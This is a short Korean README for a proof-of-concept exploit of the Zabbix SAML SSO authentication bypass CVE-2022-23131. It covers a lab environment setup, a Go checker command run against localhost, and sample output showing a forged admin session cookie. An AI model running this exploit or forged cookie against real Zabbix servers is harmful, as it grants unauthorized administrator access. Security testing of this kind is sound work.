
# CVE-2022-23131 개념 증명 익스플로잇 Zabbix SAML SSO 인증 우회 취약점(CVE-2022-23131)에 대한 개념 증명 익스플로잇입니다. 환경 설정과 대상 노출 여부를 확인하는 Go 기반 체커를 포함합니다.
CVE-2022-23131의 환경 및 PoC
CVE-2022-23131용 Zabbix 환경의 단계를 따라 SAML SSO가 포함된 Zabbix를 만들 수 있습니다.
이 PoC는 jweny의 코드를 수정한 것입니다.
사용법:
go run poc.go check -t http://localhost:8080 -u Admin
[INFO] 2022/02/24 19:49 vul exist! target: http://localhost:8080, cookie: eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiYmYyMzAxMWU1YWMyOWE1MjFlN2E1ZDZjMTAwZDQ2NjAiLCJzaWduIjoiaytKblhjVjlhQmJRa3NJc21oMVRwVEhrMGFDSTJOYkM1VGNTU1doczQ3YVIrNmpWZ1BKOGw5cWZhZlRmcjA3VGVKalNZcW5kZWRPWEtleklmS0Fjb3c9PSJ9